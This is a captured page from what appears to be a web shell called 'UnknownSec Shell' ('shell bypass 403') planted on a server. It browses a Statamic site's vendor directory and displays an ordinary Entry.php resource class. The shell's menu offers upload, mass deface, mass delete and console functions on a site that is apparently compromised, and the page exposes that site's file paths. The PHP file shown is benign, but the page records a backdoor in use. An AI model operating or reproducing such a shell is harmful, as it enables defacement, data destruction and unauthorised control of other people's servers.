shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Resources
/
CP
/
Entries
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Entry.php
<?php namespace Statamic\Http\Resources\CP\Entries; use Illuminate\Http\Resources\Json\JsonResource; class Entry extends JsonResource { public function toArray($request) { $data = [ 'id' => $this->resource->id(), 'reference' => $this->resource->reference(), 'title' => $this->resource->value('title'), 'permalink' => $this->resource->absoluteUrl(), 'published' => $this->resource->published(), 'status' => $this->resource->status(), 'private' => $this->resource->private(), 'edit_url' => $this->resource->editUrl(), 'collection' => [ 'title' => $this->resource->collection()->title(), 'handle' => $this->resource->collection()->handle(), ], ]; return ['data' => $data]; } }
© 2026 UnknownSec